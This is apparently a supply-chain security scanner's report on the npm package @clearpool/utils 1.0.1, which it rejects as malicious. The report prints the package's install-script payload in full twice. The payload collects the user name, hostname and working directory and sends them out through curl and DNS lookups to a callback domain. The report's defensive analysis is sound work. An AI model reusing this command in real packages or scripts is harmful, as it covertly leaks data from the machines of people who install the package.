@clearpool/utils @1.0.1
Internal automation library.
Maintainers
Risk Dispositions (3 applicable to this version, 0 other)
Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.
| Rule | Source | Disposition | Author | Reason | |
|---|---|---|---|---|---|
install-script:preinstall |
install-scripts | reject | AI | AI (install-scripts): Exfiltrates user/host/cwd via curl+DNS to attacker-controlled domain; malicious by design. | |
install-script:install |
install-scripts | reject | AI | AI (install-scripts): Identical exfiltration payload in install script; malicious by design. | |
bogus-package |
bogus-package | reject | AI | AI (bogus-package): Shell package with no real content, no repo, inflated semver — consistent with a malware delivery vehicle. |
SAST Findings (4)
[Always reject] Script: b64=$(echo "$(whoami):$(hostname):$(pwd):$npm_package_name" | base64 -w0); pkgsub=$(echo "$npm_package_name" | sed 's/@//g; s/\//-/g'); pkgdns=$(echo "$npm_package_name" | base64 -w0 | tr '+/' '-_' | tr -d '='); curl -sm5 https://$pkgsub.callback.m0chan.co.uk/$b64; nslookup $pkgdns.$pkgsub.callback.m0chan.co.uk
[Always reject] Script: b64=$(echo "$(whoami):$(hostname):$(pwd):$npm_package_name" | base64 -w0); pkgsub=$(echo "$npm_package_name" | sed 's/@//g; s/\//-/g'); pkgdns=$(echo "$npm_package_name" | base64 -w0 | tr '+/' '-_' | tr -d '='); curl -sm5 https://$pkgsub.callback.m0chan.co.uk/$b64; nslookup $pkgdns.$pkgsub.callback.m0chan.co.uk
[Always reject] Matched 7 signal(s), weighted score 10: • [S_KNOWN_SPAM_PUBLISHER] Maintainer(s) previously flagged as spam: aidanmochan. • [S_README_NO_CODE] Short README with no code block, no install instructions, and no usage/API section. • [S_NO_REPO_NO_HOME] No repository, homepage, or bugs URL — genuine packages almost always link somewhere. • [S_NO_KEYWORDS] No keywords declared. • [S_NO_DEPS] No runtime, dev, peer, or optional dependencies declared. • [S_TINY_PAYLOAD] Tiny payload: 1 code file(s), 948 bytes total. • [S_EMPTY_MAIN] Entry point (index.js) is 21 bytes — effectively empty.
Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
Review Summary
Risk score: 100 (capped from 123). Findings: 3 critical (+120), 1 low (+3), 1 info (+0).
Published to npm: